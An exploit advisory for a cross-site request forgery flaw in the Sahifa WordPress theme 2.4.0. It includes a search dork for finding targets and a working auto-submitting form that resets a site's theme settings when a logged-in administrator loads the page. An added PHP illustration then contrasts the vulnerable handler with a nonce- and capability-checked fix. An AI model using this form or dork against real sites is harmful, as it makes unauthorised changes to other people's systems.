
WordPress Sahifa theme CSRF exploit

Author: Dr.AFN[D]ENA, Published: 19-01-2015
The Sahifa theme for WordPress is prone to multiple cross-site request forgery (CSRF) vulnerabilities because the application fails to properly validate HTTP requests: state-changing admin actions are accepted without a nonce or any other proof that the request originated from the theme's own settings page.

Exploiting these issues may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.

Sahifa 2.4.0 is vulnerable; other versions may also be affected.

Dork:inurl:wp-admin/admin.php
<h1>Wordpress sahifa theme CSRF exploit By Dr.AFN[D]ENA<br></h1>

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://local/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />
<!-- <input name="reset" type="submit" value="Reset Settings" />-->
</form>
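Added illustration, not Sahifa's own code: the handler pattern that lets the auto-submitting form above reset a theme's settings, beside the nonce- and capability-checked version that rejects it. The function names sahifa_demo_* and the option name 'sahifa_demo_options' are hypothetical placeholders; the WordPress API calls (wp_nonce_field, check_admin_referer, current_user_can, delete_option) are the real core functions.

```php
<?php
// Illustration only; not code from the Sahifa theme. The sahifa_demo_*
// names and the 'sahifa_demo_options' option are hypothetical placeholders.

// Vulnerable pattern: the handler trusts any request whose query string and
// POST body carry the expected values. A logged-in admin who merely loads a
// third-party page with the auto-submitting form above sends exactly that
// request, cookies included, and the settings are wiped.
function sahifa_demo_reset_vulnerable() {
    if ( isset( $_GET['page'], $_GET['reset'], $_POST['action'] )
         && $_GET['page'] === 'panel' && $_GET['reset'] === 'true'
         && $_POST['action'] === 'reset' ) {
        delete_option( 'sahifa_demo_options' );
    }
}

// Hardened pattern, step 1: the legitimate form carries a nonce that is bound
// to this action and to the current user's session. A cross-site page cannot
// read or forge that value.
function sahifa_demo_reset_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=panel&reset=true' ) ); ?>">
        <?php wp_nonce_field( 'sahifa_demo_reset', '_sahifa_nonce' ); ?>
        <input type="hidden" name="action" value="reset" />
        <?php submit_button( 'Reset Settings' ); ?>
    </form>
    <?php
}

// Hardened pattern, step 2: the handler checks who is asking and verifies the
// nonce before touching any option. check_admin_referer() calls wp_die() on a
// missing or stale nonce, so the forged request above never reaches delete_option().
function sahifa_demo_reset_hardened() {
    if ( ! isset( $_POST['action'] ) || $_POST['action'] !== 'reset' ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'sahifa_demo_reset', '_sahifa_nonce' );
    delete_option( 'sahifa_demo_options' );
    add_settings_error( 'sahifa_demo', 'reset', 'Settings reset.', 'updated' );
}
add_action( 'admin_init', 'sahifa_demo_reset_hardened' );
```

The same two checks (capability, then nonce) apply to every other state-changing action the theme's settings panel exposes; the reset action is just the one the advisory demonstrates.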
